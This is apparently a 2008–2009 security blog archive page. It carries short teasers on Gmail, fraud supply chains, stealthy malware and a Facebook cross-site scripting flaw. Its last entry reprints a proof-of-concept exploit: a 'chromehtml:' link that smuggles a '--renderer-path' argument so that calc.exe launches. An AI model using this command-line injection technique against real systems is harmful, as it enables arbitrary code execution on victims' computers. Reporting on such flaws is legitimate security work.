Tuesday, March 3rd, 2009 Gmail is Google's "free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it ...
Posted in Coding, Internet, Security | No Comments
Tuesday, January 6th, 2009 The economic lifecycle of the underground fraud community functions very similarly to the world of legitimate business. Online fraudsters have supply chains, third-party outsourcers, vendors, and online forums where people with skills and people with opportunities to commit fraud can find each other. The underground fraud supply chain is becoming ...
Posted in Internet, Privacy, Security | No Comments
Monday, January 5th, 2009 Do not expect that your system would start misbehaving once it is infected by a malware. Malwares can perform their functions without showing any symptoms for days, months or years. New malwares are capable of hiding themselves even from powerful Antivirus scan engines. They can also perform their jobs without affecting ...
Posted in Coding, Internet, Security | No Comments
Saturday, January 3rd, 2009 DaiMon has once more discovered a new critical cross-site scripting vulnerability which affects the Facebook "Reset Password" page. Malicious users can inject code to phish credentials and other sensitive personal information from millions of Facebook members.We hope that this serious flaw gets fixed quickly as is usually the case with ...
Posted in Coding, Internet, Privacy, Security | 2 Comments
Tuesday, December 23rd, 2008 Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.htmlclick the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>Source:
http://www.milw0rm.com/exploits/7566
Posted in Coding, Internet, Security, Software | No Comments
